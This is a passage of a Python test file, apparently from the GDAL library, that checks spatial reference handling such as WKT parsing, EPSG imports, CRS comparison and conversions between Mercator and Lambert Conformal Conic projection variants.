PARAMETER["false_northing",0], UNIT["metre",1, AUTHORITY["EPSG","9001"]], AXIS["Easting",EAST], AXIS["Northing",NORTH], AUTHORITY["EPSG","2038"]]""") assert srs.Validate() == 0 ############################################################################### # Test the IsSame() method (and the IsSameGeogCS() method through that) def test_osr_basic_11(): srs1 = osr.SpatialReference() srs1.SetFromUserInput("""PROJCS["NAD83(CSRS98) / UTM zone 20N (deprecated)", GEOGCS["NAD83(CSRS98)", DATUM["NAD83_Canadian_Spatial_Reference_System", SPHEROID["GRS 1980",6378137,298.257222101, AUTHORITY["EPSG","7019"]], TOWGS84[0,0,0,0,0,0,0], AUTHORITY["EPSG","6140"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9108"]], AUTHORITY["EPSG","4140"]], PROJECTION["Transverse_Mercator"], PARAMETER["latitude_of_origin",0], PARAMETER["central_meridian",-63], PARAMETER["scale_factor",0.9996], PARAMETER["false_easting",500000], PARAMETER["false_northing",0], UNIT["metre",1, AUTHORITY["EPSG","9001"]], AUTHORITY["EPSG","2038"], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") srs2 = osr.SpatialReference() srs2.SetFromUserInput("""PROJCS["NAD83(CSRS98) / UTM zone 20N (deprecated)", GEOGCS["NAD83(CSRS98)", DATUM["NAD83_Canadian_Spatial_Reference_System", SPHEROID["GRS 1980",6378137,298.257222101, AUTHORITY["EPSG","7019"]], TOWGS84[0,0,0,0,0,0,0], AUTHORITY["EPSG","6140"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9108"]], AUTHORITY["EPSG","4140"]], PROJECTION["Transverse_Mercator"], PARAMETER["central_meridian",-63], PARAMETER["scale_factor",0.9996], PARAMETER["false_easting",500000], PARAMETER["false_northing",0], UNIT["metre",1, AUTHORITY["EPSG","9001"]], AUTHORITY["EPSG","2038"], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") assert srs1.IsSame(srs2) ############################################################################### # Test URN support for OGC:CRS84. def test_osr_basic_12(): wkt_1 = osr.GetUserInputAsWKT('CRS:84') wkt_2 = osr.GetUserInputAsWKT('WGS84') assert wkt_1 == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Longitude",EAST],AXIS["Latitude",NORTH]]' assert wkt_2 == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]' ############################################################################### # Test GEOCCS lookup in supporting data files. def test_osr_basic_13(): srs = osr.SpatialReference() with gdaltest.config_option('OSR_USE_NON_DEPRECATED', 'NO'): srs.ImportFromEPSG(4328) expected_wkt = 'GEOCCS["WGS 84 (geocentric) (deprecated)",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Geocentric X",OTHER],AXIS["Geocentric Y",OTHER],AXIS["Geocentric Z",NORTH],AUTHORITY["EPSG","4328"]]' wkt = srs.ExportToWkt() assert wkt == expected_wkt, 'did not get expected GEOCCS WKT.' assert srs.IsGeocentric(), 'srs not recognised as geocentric.' assert srs.Validate() == 0, 'epsg geoccs import does not validate!' ############################################################################### # Manually setup a simple geocentric/wgs84 srs. def test_osr_basic_14(): srs = osr.SpatialReference() srs.SetGeocCS('My Geocentric') srs.SetWellKnownGeogCS('WGS84') srs.SetLinearUnits('meter', 1.0) expected_wkt = 'GEOCCS["My Geocentric",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["meter",1],AXIS["Geocentric X",OTHER],AXIS["Geocentric Y",OTHER],AXIS["Geocentric Z",NORTH]]' wkt = srs.ExportToWkt() assert wkt == expected_wkt, 'did not get expected GEOCCS WKT.' assert srs.IsGeocentric(), 'srs not recognised as geocentric.' assert srs.Validate() == 0, 'geocentric srs not recognised as valid.' ############################################################################### # Test validation and fixup methods. def test_osr_basic_15(): wkt = """GEOCCS["WGS 84 (geocentric)", PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563, AUTHORITY["EPSG","7030"]], AUTHORITY["EPSG","6326"]], UNIT["metre",1], AXIS["Geocentric X",OTHER], AXIS["Geocentric Y",OTHER], AXIS["Geocentric Z",OTHER], AUTHORITY["EPSG","4328"]]""" srs = osr.SpatialReference() srs.SetFromUserInput(wkt) # Missing PRIMEM assert srs.Validate() != 0 ############################################################################### # Test OSRSetGeocCS() def test_osr_basic_16(): # Nominal test : change citation of a GEOCCS srs = osr.SpatialReference() srs.SetFromUserInput("""GEOCCS["WGS 84 (geocentric)", PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563, AUTHORITY["EPSG","7030"]], AUTHORITY["EPSG","6326"]], UNIT["metre",1], AXIS["Geocentric X",OTHER], AXIS["Geocentric Y",OTHER], AXIS["Geocentric Z",OTHER], AUTHORITY["EPSG","4328"]]""") srs.SetGeocCS("a") expect_wkt = """GEOCCS["a", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563, AUTHORITY["EPSG","7030"]], AUTHORITY["EPSG","6326"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["metre",1], AXIS["Geocentric X",OTHER], AXIS["Geocentric Y",OTHER], AXIS["Geocentric Z",NORTH], AUTHORITY["EPSG","4328"]]""" wkt = srs.ExportToPrettyWkt() if wkt != expect_wkt: print('Got:%s' % wkt) print('Expected:%s' % expect_wkt) pytest.fail('Did not get expected result.') # Build GEOCCS from a valid GEOGCS srs = osr.SpatialReference() srs.ImportFromEPSG(4326) srs.SetGeocCS("a") expect_wkt = """GEOCCS["WGS 84", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563, AUTHORITY["EPSG","7030"]], AUTHORITY["EPSG","6326"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["metre",1, AUTHORITY["EPSG","9001"]], AXIS["Geocentric X",OTHER], AXIS["Geocentric Y",OTHER], AXIS["Geocentric Z",NORTH]]""" wkt = srs.ExportToPrettyWkt() if wkt != expect_wkt: print('Got:%s' % wkt) print('Expected:%s' % expect_wkt) pytest.fail('Did not get expected result.') # Error expected. Cannot work on a PROJCS srs = osr.SpatialReference() srs.ImportFromEPSG(32631) ret = srs.SetGeocCS("a") if ret == 0: print(srs) pytest.fail('expected failure') # Limit test : build GEOCCS from an invalid GEOGCS srs = osr.SpatialReference() with gdaltest.error_handler(): assert srs.SetFromUserInput("""GEOGCS["foo"]""") != 0 ############################################################################### # Test OGC URL support def test_osr_basic_17(): wkt_1 = osr.GetUserInputAsWKT('urn:ogc:def:crs:EPSG::4326') wkt_2 = osr.GetUserInputAsWKT('http://www.opengis.net/def/crs/EPSG/0/4326') assert wkt_1 == wkt_2, 'CRS URL parsing not as expected.' ############################################################################### # Test OGC URL support for compound CRS def test_osr_basic_18(): # This is a dummy one, but who cares wkt = osr.GetUserInputAsWKT('http://www.opengis.net/def/crs-compound?1=http://www.opengis.net/def/crs/EPSG/0/4326&2=http://www.opengis.net/def/crs/EPSG/0/4326') assert wkt.startswith('COMPD_CS'), 'CRS URL parsing not as expected.' ############################################################################### # Test well known GCS names against their corresponding EPSG definitions (#6080) def test_osr_basic_19(): sr = osr.SpatialReference() sr.SetWellKnownGeogCS('WGS84') sr_ref = osr.SpatialReference() sr_ref.ImportFromEPSG(4326) assert sr.ExportToWkt() == sr_ref.ExportToWkt() sr = osr.SpatialReference() sr.SetWellKnownGeogCS('WGS72') sr_ref = osr.SpatialReference() sr_ref.ImportFromEPSG(4322) assert sr.ExportToWkt() == sr_ref.ExportToWkt() sr = osr.SpatialReference() sr.SetWellKnownGeogCS('NAD27') sr_ref = osr.SpatialReference() sr_ref.ImportFromEPSG(4267) assert sr.ExportToWkt() == sr_ref.ExportToWkt() sr = osr.SpatialReference() sr.SetWellKnownGeogCS('NAD83') sr_ref = osr.SpatialReference() sr_ref.ImportFromEPSG(4269) assert sr.ExportToWkt() == sr_ref.ExportToWkt() ############################################################################### # Test GetAxisName() and GetAxisOrientation() and GetAngularUnitsName() def test_osr_basic_20(): sr = osr.SpatialReference() sr.ImportFromEPSGA(4326) assert sr.GetAxesCount() == 2 assert sr.GetAxisName(None, 0) == 'Geodetic latitude' assert sr.GetAxisOrientation(None, 0) == osr.OAO_North assert sr.GetAxisName('GEOGCS', 1) == 'Geodetic longitude' assert sr.GetAxisOrientation('GEOGCS', 1) == osr.OAO_East assert sr.GetAngularUnitsName() == 'degree' sr = osr.SpatialReference() sr.SetFromUserInput('EPSG:4326+5773') assert sr.GetAxisName(None, 0) == 'Geodetic latitude' assert sr.GetAxisOrientation(None, 0) == osr.OAO_North assert sr.GetAxisName(None, 1) == 'Geodetic longitude' assert sr.GetAxisOrientation(None, 1) == osr.OAO_East assert sr.GetAxisName(None, 2) == 'Gravity-related height' assert sr.GetAxisOrientation(None, 2) == osr.OAO_Up ############################################################################### # Test IsSame() with equivalent forms of Mercator_1SP and Mercator_2SP def test_osr_basic_21(): wkt1 = """PROJCS["unnamed", GEOGCS["Segara (Jakarta)", DATUM["Gunung_Segara_Jakarta", SPHEROID["Bessel 1841",6377397.155,299.1528128]], PRIMEM["Jakarta",106.8077194444444], UNIT["degree",0.0174532925199433]], PROJECTION["Mercator_2SP"], PARAMETER["central_meridian",110], PARAMETER["false_easting",3900000], PARAMETER["false_northing",900000], PARAMETER["standard_parallel_1",4.45405154589751], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""" wkt2 = """PROJCS["unnamed", GEOGCS["Segara (Jakarta)", DATUM["Gunung_Segara_Jakarta", SPHEROID["Bessel 1841",6377397.155,299.1528128]], PRIMEM["Jakarta",106.8077194444444], UNIT["degree",0.0174532925199433]], PROJECTION["Mercator_1SP"], PARAMETER["central_meridian",110], PARAMETER["scale_factor",0.997], PARAMETER["false_easting",3900000], PARAMETER["false_northing",900000], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""" wkt2_not_equivalent = """PROJCS["unnamed", GEOGCS["Segara (Jakarta)", DATUM["Gunung_Segara_Jakarta", SPHEROID["Bessel 1841",6377397.155,299.1528128]], PRIMEM["Jakarta",106.8077194444444], UNIT["degree",0.0174532925199433]], PROJECTION["Mercator_1SP"], PARAMETER["central_meridian",110], PARAMETER["scale_factor",0.998], PARAMETER["false_easting",3900000], PARAMETER["false_northing",900000], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""" sr1 = osr.SpatialReference() sr1.ImportFromWkt(wkt1) sr2 = osr.SpatialReference() sr2.ImportFromWkt(wkt2) assert sr1.IsSame(sr2) != 0 assert sr2.IsSame(sr1) != 0 sr2_not_equivalent = osr.SpatialReference() sr2_not_equivalent.ImportFromWkt(wkt2_not_equivalent) assert sr1.IsSame(sr2_not_equivalent) != 1 ############################################################################### # Test LCC_2SP -> LCC_1SP -> LCC_2SP def test_osr_basic_22(): sr = osr.SpatialReference() sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101, AUTHORITY["EPSG","7019"]], TOWGS84[0,0,0,0,0,0,0], AUTHORITY["EPSG","6171"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9122"]], AUTHORITY["EPSG","4171"]], PROJECTION["Lambert_Conformal_Conic_2SP"], PARAMETER["standard_parallel_1",49], PARAMETER["standard_parallel_2",44], PARAMETER["latitude_of_origin",46.5], PARAMETER["central_meridian",3], PARAMETER["false_easting",700000], PARAMETER["false_northing",6600000], UNIT["metre",1, AUTHORITY["EPSG","9001"]], AXIS["X",EAST], AXIS["Y",NORTH], AUTHORITY["EPSG","2154"]]""") sr2 = sr.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_1SP) expected_sr2_wkt = """PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101, AUTHORITY["EPSG","7019"]], TOWGS84[0,0,0,0,0,0,0], AUTHORITY["EPSG","6171"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9122"]], AUTHORITY["EPSG","4171"]], PROJECTION["Lambert_Conformal_Conic_1SP"], PARAMETER["latitude_of_origin",46.5194302239868], PARAMETER["central_meridian",3], PARAMETER["scale_factor",0.9990510286374693], PARAMETER["false_easting",700000], PARAMETER["false_northing",6602157.83881033], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""" expected_sr2 = osr.SpatialReference() expected_sr2.ImportFromWkt(expected_sr2_wkt) assert sr2.IsSame(expected_sr2) != 0 # Back to LCC_2SP sr3 = sr2.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_2SP) assert sr3.IsSame(sr) != 0 # Particular case of LCC_2SP with phi0=phi1=phi2 sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101, AUTHORITY["EPSG","7019"]], TOWGS84[0,0,0,0,0,0,0], AUTHORITY["EPSG","6171"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9122"]], AUTHORITY["EPSG","4171"]], PROJECTION["Lambert_Conformal_Conic_2SP"], PARAMETER["standard_parallel_1",46.5], PARAMETER["standard_parallel_2",46.5], PARAMETER["latitude_of_origin",46.5], PARAMETER["central_meridian",3], PARAMETER["false_easting",700000], PARAMETER["false_northing",6600000], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_1SP) expected_sr2_wkt = """PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101, AUTHORITY["EPSG","7019"]], TOWGS84[0,0,0,0,0,0,0], AUTHORITY["EPSG","6171"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9122"]], AUTHORITY["EPSG","4171"]], PROJECTION["Lambert_Conformal_Conic_1SP"], PARAMETER["latitude_of_origin",46.5], PARAMETER["central_meridian",3], PARAMETER["scale_factor",1], PARAMETER["false_easting",700000], PARAMETER["false_northing",6600000], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""" expected_sr2 = osr.SpatialReference() expected_sr2.ImportFromWkt(expected_sr2_wkt) assert sr2.IsSame(expected_sr2) != 0 sr3 = sr2.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_2SP) assert sr3.IsSame(sr) != 0 # Particular case of LCC_2SP with phi0 != phi1 and phi1=phi2 sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101, AUTHORITY["EPSG","7019"]], TOWGS84[0,0,0,0,0,0,0], AUTHORITY["EPSG","6171"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9122"]], AUTHORITY["EPSG","4171"]], PROJECTION["Lambert_Conformal_Conic_2SP"], PARAMETER["standard_parallel_1",46.4567], PARAMETER["standard_parallel_2",46.4567], PARAMETER["latitude_of_origin",46.123], PARAMETER["central_meridian",3], PARAMETER["false_easting",700000], PARAMETER["false_northing",6600000], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_1SP) expected_sr2_wkt = """PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101, AUTHORITY["EPSG","7019"]], TOWGS84[0,0,0,0,0,0,0], AUTHORITY["EPSG","6171"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9122"]], AUTHORITY["EPSG","4171"]], PROJECTION["Lambert_Conformal_Conic_1SP"], PARAMETER["latitude_of_origin",46.4567], PARAMETER["central_meridian",3], PARAMETER["scale_factor",1], PARAMETER["false_easting",700000], PARAMETER["false_northing",6637093.292952879], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""" expected_sr2 = osr.SpatialReference() expected_sr2.ImportFromWkt(expected_sr2_wkt) assert sr2.IsSame(expected_sr2) != 0 sr3 = sr2.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_2SP) expected_sr3_wkt = """PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101, AUTHORITY["EPSG","7019"]], TOWGS84[0,0,0,0,0,0,0], AUTHORITY["EPSG","6171"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9122"]], AUTHORITY["EPSG","4171"]], PROJECTION["Lambert_Conformal_Conic_2SP"], PARAMETER["standard_parallel_1",46.4567], PARAMETER["standard_parallel_2",46.4567], PARAMETER["latitude_of_origin",46.4567], PARAMETER["central_meridian",3], PARAMETER["false_easting",700000], PARAMETER["false_northing",6637093.292952879], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""" expected_sr3 = osr.SpatialReference() expected_sr3.ImportFromWkt(expected_sr3_wkt) assert sr3.IsSame(expected_sr3) != 0 ############################################################################### # Test LCC_1SP -> LCC_2SP -> LCC_1SP def test_osr_basic_23(): sr = osr.SpatialReference() sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["NTF (Paris)", DATUM["Nouvelle_Triangulation_Francaise_Paris", SPHEROID["Clarke 1880 (IGN)",6378249.2,293.4660212936269, AUTHORITY["EPSG","7011"]], TOWGS84[-168,-60,320,0,0,0,0], AUTHORITY["EPSG","6807"]], PRIMEM["Paris",2.33722917, AUTHORITY["EPSG","8903"]], UNIT["grad",0.01570796326794897, AUTHORITY["EPSG","9105"]], AUTHORITY["EPSG","4807"]], PROJECTION["Lambert_Conformal_Conic_1SP"], PARAMETER["latitude_of_origin",46.85], PARAMETER["central_meridian",0], PARAMETER["scale_factor",0.99994471], PARAMETER["false_easting",234.358], PARAMETER["false_northing",4185861.369], UNIT["metre",1, AUTHORITY["EPSG","9001"]], AXIS["X",EAST], AXIS["Y",NORTH], AUTHORITY["EPSG","27584"]]""") sr2 = sr.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_2SP) expected_sr2_wkt = """PROJCS["unnamed", GEOGCS["NTF (Paris)", DATUM["Nouvelle_Triangulation_Francaise_Paris", SPHEROID["Clarke 1880 (IGN)",6378249.2,293.4660212936269, AUTHORITY["EPSG","7011"]], TOWGS84[-168,-60,320,0,0,0,0], AUTHORITY["EPSG","6807"]], PRIMEM["Paris",2.33722917, AUTHORITY["EPSG","8903"]], UNIT["grad",0.01570796326794897, AUTHORITY["EPSG","9105"]], AUTHORITY["EPSG","4807"]], PROJECTION["Lambert_Conformal_Conic_2SP"], PARAMETER["standard_parallel_1",47.51962607709162], PARAMETER["standard_parallel_2",46.17820871246364], PARAMETER["latitude_of_origin",46.85], PARAMETER["central_meridian",0], PARAMETER["false_easting",234.358], PARAMETER["false_northing",4185861.369], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""" expected_sr2 = osr.SpatialReference() expected_sr2.ImportFromWkt(expected_sr2_wkt) assert sr2.IsSame(expected_sr2) != 0 # Back to LCC_2SP sr3 = sr2.ConvertToOtherProjection(osr.SRS_PT_LAMBERT_CONFORMAL_CONIC_1SP) assert sr3.IsSame(sr) != 0 ############################################################################### # Test Mercator_1SP -> Mercator_2SP -> Mercator_1SP def test_osr_basic_24(): sr = osr.SpatialReference() sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["WGS 84", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563, AUTHORITY["EPSG","7030"]], AUTHORITY["EPSG","6326"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9122"]], AUTHORITY["EPSG","4326"]], PROJECTION["Mercator_1SP"], PARAMETER["central_meridian",0], PARAMETER["scale_factor",0.5], PARAMETER["false_easting",0], PARAMETER["false_northing",0], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection(osr.SRS_PT_MERCATOR_2SP) expected_sr2_wkt = """PROJCS["unnamed", GEOGCS["WGS 84", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563, AUTHORITY["EPSG","7030"]], AUTHORITY["EPSG","6326"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9122"]], AUTHORITY["EPSG","4326"]], PROJECTION["Mercator_2SP"], PARAMETER["standard_parallel_1",60.08325228676391], PARAMETER["central_meridian",0], PARAMETER["false_easting",0], PARAMETER["false_northing",0], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""" expected_sr2 = osr.SpatialReference() expected_sr2.ImportFromWkt(expected_sr2_wkt) assert sr2.IsSame(expected_sr2) != 0 # Back to LCC_2SP sr3 = sr2.ConvertToOtherProjection(osr.SRS_PT_MERCATOR_1SP) assert sr3.IsSame(sr) != 0 ############################################################################### # Test corner cases of ConvertToOtherProjection() def test_osr_basic_25(): sr = osr.SpatialReference() sr.SetFromUserInput("""GEOGCS["WGS 84", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433]]""") sr2 = sr.ConvertToOtherProjection('Mercator_1SP') assert sr2 is None sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["WGS 84", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433]], PROJECTION["Mercator_1SP"], PARAMETER["central_meridian",0], PARAMETER["scale_factor",0.5], PARAMETER["false_easting",0], PARAMETER["false_northing",0], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection(None) assert sr2 is None sr2 = sr.ConvertToOtherProjection('foo') assert sr2 is None sr2 = sr.ConvertToOtherProjection('Mercator_1SP') assert sr2.IsSame(sr) != 0 # Mercator_1SP -> Mercator_2SP: Negative scale factor sr = osr.SpatialReference() sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["WGS 84", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433]], PROJECTION["Mercator_1SP"], PARAMETER["central_meridian",0], PARAMETER["scale_factor",-0.5], PARAMETER["false_easting",0], PARAMETER["false_northing",0], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Mercator_2SP') assert sr2 is None # Mercator_1SP -> Mercator_2SP: Invalid eccentricity sr = osr.SpatialReference() sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["WGS 84", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,0.1]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433]], PROJECTION["Mercator_1SP"], PARAMETER["central_meridian",0], PARAMETER["scale_factor",0.5], PARAMETER["false_easting",0], PARAMETER["false_northing",0], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Mercator_2SP') assert sr2 is None # Mercator_2SP -> Mercator_1SP: Invalid standard_parallel_1 sr = osr.SpatialReference() sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["WGS 84", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433]], PROJECTION["Mercator_2SP"], PARAMETER["standard_parallel_1",100], PARAMETER["central_meridian",0], PARAMETER["false_easting",0], PARAMETER["false_northing",0], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Mercator_1SP') assert sr2 is None # Mercator_2SP -> Mercator_1SP: Invalid eccentricity sr = osr.SpatialReference() sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["WGS 84", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,0.1]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433]], PROJECTION["Mercator_2SP"], PARAMETER["standard_parallel_1",60], PARAMETER["central_meridian",0], PARAMETER["false_easting",0], PARAMETER["false_northing",0], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Mercator_1SP') assert sr2 is None # LCC_1SP -> LCC_2SP: Negative scale factor sr = osr.SpatialReference() sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["NTF (Paris)", DATUM["Nouvelle_Triangulation_Francaise_Paris", SPHEROID["Clarke 1880 (IGN)",6378249.2,293.4660212936269]], PRIMEM["Paris",2.33722917], UNIT["grad",0.01570796326794897]], PROJECTION["Lambert_Conformal_Conic_1SP"], PARAMETER["latitude_of_origin",46.85], PARAMETER["central_meridian",0], PARAMETER["scale_factor",-0.99994471], PARAMETER["false_easting",234.358], PARAMETER["false_northing",4185861.369], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_2SP') assert sr2 is None # LCC_1SP -> LCC_2SP: Invalid eccentricity sr = osr.SpatialReference() sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["NTF (Paris)", DATUM["Nouvelle_Triangulation_Francaise_Paris", SPHEROID["Clarke 1880 (IGN)",6378249.2,0.1]], PRIMEM["Paris",2.33722917], UNIT["grad",0.01570796326794897]], PROJECTION["Lambert_Conformal_Conic_1SP"], PARAMETER["latitude_of_origin",46.85], PARAMETER["central_meridian",0], PARAMETER["scale_factor",0.99994471], PARAMETER["false_easting",234.358], PARAMETER["false_northing",4185861.369], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_2SP') assert sr2 is None # LCC_1SP -> LCC_2SP: Invalid latitude_of_origin sr = osr.SpatialReference() sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["NTF (Paris)", DATUM["Nouvelle_Triangulation_Francaise_Paris", SPHEROID["Clarke 1880 (IGN)",6378249.2,293.4660212936269]], PRIMEM["Paris",2.33722917], UNIT["grad",0.01570796326794897]], PROJECTION["Lambert_Conformal_Conic_1SP"], PARAMETER["latitude_of_origin",200], PARAMETER["central_meridian",0], PARAMETER["scale_factor",0.99994471], PARAMETER["false_easting",234.358], PARAMETER["false_northing",4185861.369], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_2SP') assert sr2 is None # LCC_1SP -> LCC_2SP: latitude_of_origin == 0 sr = osr.SpatialReference() sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["NTF (Paris)", DATUM["Nouvelle_Triangulation_Francaise_Paris", SPHEROID["Clarke 1880 (IGN)",6378249.2,293.4660212936269]], PRIMEM["Paris",2.33722917], UNIT["grad",0.01570796326794897]], PROJECTION["Lambert_Conformal_Conic_1SP"], PARAMETER["latitude_of_origin",0], PARAMETER["central_meridian",0], PARAMETER["scale_factor",0.99994471], PARAMETER["false_easting",234.358], PARAMETER["false_northing",4185861.369], UNIT["metre",1], AXIS["Easting",EAST], AXIS["Northing",NORTH]]""") sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_2SP') assert sr2 is None # LCC_2SP -> LCC_1SP : Invalid standard_parallel_1 sr.SetFromUserInput("""PROJCS["unnamed", GEOGCS["RGF93", DATUM["Reseau_Geodesique_Francais_1993", SPHEROID["GRS 1980",6378137,298.257222101]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], 